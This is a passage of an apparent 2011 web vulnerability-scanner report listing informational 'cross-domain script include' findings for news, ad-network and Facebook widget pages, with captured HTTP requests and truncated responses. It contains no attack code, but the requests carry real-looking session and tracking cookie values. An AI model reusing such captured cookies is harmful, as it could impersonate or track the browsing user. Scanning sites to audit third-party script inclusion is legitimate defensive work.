F1=BEGpK3kAAAAAz04CAEAAgEgAAAAAVK6CAEAAgEgAAAAA6N/CAEAAgEABAAAABAAAAYAASEA; BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2ufXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; ROLL=boAnv2Cov1BglnGDmmmzcgHSg94V6NBUl5QpXT083Kaw4lx9LehaUKI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.755601.0XMC
Set-Cookie: C2=tE+yN5pqCIxFGcnovMg3sYAHSK8BItdRvfQ3WX07HsY4F9+BA9qRvfAZhX07H0eDG9+Bw3gRvfw7NY07HMa4F9+BbGeRvfg2kX07HsjmG9+B6ijRvfAmhX07HAY4F9+BdDmRvfgihX07HgJaG9+BcbpRvfAhhX07Hca4F9+BEHoRvfwoya07Hoa4F9+B4GoRvfw2kX07HYnXG9+BWGoRvfwKOa071q6AaMrBcU7qDEysGfUkBMAoNXIcmZOiGgasjMAbUaESNSPC73cBwtIuDUAsFknZrgqxiBrnD8ekGdYl0Pw6iaQeTC1A0kdRHyq7DEwcGdItyNw2sa0hpewAP7lRHCKYE8KIGywsVTAJqawWj+OBXTjBTGJwFsb0Funr5XAhTaQqzCVBLRqB0iq/FEqXGp7nDXAIcYc41+vBVSrh/QW60a4dhahBdPih1FKvGcuKGdHmOYALjYMVGw5oGTlBxbfxUlqRHU/XGNQh4W2gLY4TxSyBvRpB0NrdHAPpG95s3cQ7ja4nz2yBCPqBgD; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: F1=B0S4L3EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uHXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: ROLL=boAno2C+ORAg3QH!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: 1468728=_4dcbe12d,6658486637,755601^894875^1^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 12 May 2011 13:31:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000755601/mnum=0000894875/cstr=1468728=_4dcbe12d,6658486637,755601^894875^1^0,1_/xsxdata=$xsxdata/bnum=1468728/optn=64?trg="><\/script>
...[SNIP]...
14.19. http://routenote.com/blog/TFadvertising/300.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://routenote.com
Path:   /blog/TFadvertising/300.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/TFadvertising/300.htm HTTP/1.1
Host: routenote.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 07:42:15 GMT
ETag: "40801f-bef-4a30f53f143c0"
Accept-Ranges: bytes
Content-Length: 3055
Cache-Control: max-age=1
Expires: Thu, 12 May 2011 13:29:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"
xmlns="http://www.w3.org/TR/REC-html40">

<hea
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
14.20. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1656
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
14.21. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://urbanlegends.about.com
Path:   /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm HTTP/1.1
Host: urbanlegends.about.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=13

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:10 GMT
Content-Type: text/html
Content-Length: 27113

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta name="docset" content="6"><meta http-equiv="Set-Cookie" content="Mint=B5CDWA1G
...[SNIP]...
</script>
<script language="JavaScript" src="http://0.tqn.com/0g/js/cj017x14t421p9.js?rdv=j23"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
14.22. http://www.chromium.org/chromium-os  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chromium.org
Path:   /chromium-os

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /chromium-os HTTP/1.1
Host: www.chromium.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Robots-Tag: noarchive
Last-Modified: Thu, 12 May 2011 03:22:04 GMT
ETag: "1305170524368|#public|en|||0"
Expires: Thu, 12 May 2011 13:28:15 GMT
Date: Thu, 12 May 2011 13:28:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 23190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Comp
...[SNIP]...
</script>
<script xmlns="http://www.w3.org/1999/xhtml" src="http://www.gstatic.com/sites/p/7809f1/system/js/jot_min_view__en.js"></script>
...[SNIP]...
14.23. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>


               <script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
<!-- stats tag ['ECP'] -->
<script type="text/javascript" src="http://apptap.scripps.com/apptap3?site=ECP&amp;app=djeff&amp;path=/entertainment/local/article/heder-here-in-this-spp-ppppp&amp;title=Friday 13th double feature screens local filmmakers' latest work&amp;k=v&amp;topic=Entertainment+%28NPC%29"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://cm.npc-scripps.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
14.24. http://www.dailyfeatures.com/corridor/fodjava.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfeatures.com
Path:   /corridor/fodjava.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corridor/fodjava.cfm?type=7 HTTP/1.1
Host: www.dailyfeatures.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 13:32:39 GMT
Server: domainserver
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 31664

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv="Content-Type" content="text
...[SNIP]...
</link>
<script
src="http://www.gstatic.com/domainads/js/afd_signals_1.js"
type="text/javascript">
</script>
...[SNIP]...
14.25. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.examiner.com
Path:   /fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 13:31:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Expires: Fri, 13 May 2011 13:31:46 +0000
Last-Modified: Thu, 12 May 2011 13:31:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1305207106"
Set-Cookie: EXAMINEREDITION=921; expires=Sun, 09-May-2021 13:31:46 GMT; path=/; domain=.examiner.com
X-Generator: Drupal 7 (http://drupal.org)
X-WebNode: web7.b.examiner.com
Vary: Accept-Encoding
Content-Length: 87125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<!-- start brighttag beacon -->
<script src="//s.btstatic.com/tag.js">
{ site: "k1CElgt" }
</script>
...[SNIP]...
14.26. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.71.123
X-Cnection: close
Date: Thu, 12 May 2011 13:32:01 GMT
Content-Length: 12141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.27. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.77.109
X-Cnection: close
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Length: 13301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.28. http://www.facebook.com/plugins/comments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/comments.php?api_key=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df4fd8bba4%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.examiner.com%2Ffight-sports-in-national%2Fcomplete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&locale=en_US&numposts=10&sdk=joey&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=qo83J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.23.130
X-Cnection: close
Date: Thu, 12 May 2011 13:33:38 GMT
Elapsed: 0.060
Content-Length: 15491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=40 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.215.129
X-Cnection: close
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 8926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.30. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?id=94783579879&width=300&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.122
X-Cnection: close
Date: Thu, 12 May 2011 13:29:53 GMT
Content-Length: 8996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/mIRZkgozNNM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.31. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.211.110
X-Cnection: close
Date: Thu, 12 May 2011 13:32:46 GMT
Content-Length: 7359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
14.32. http://www.fridaythe13thmovie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fridaythe13thmovie.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.fridaythe13thmovie.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
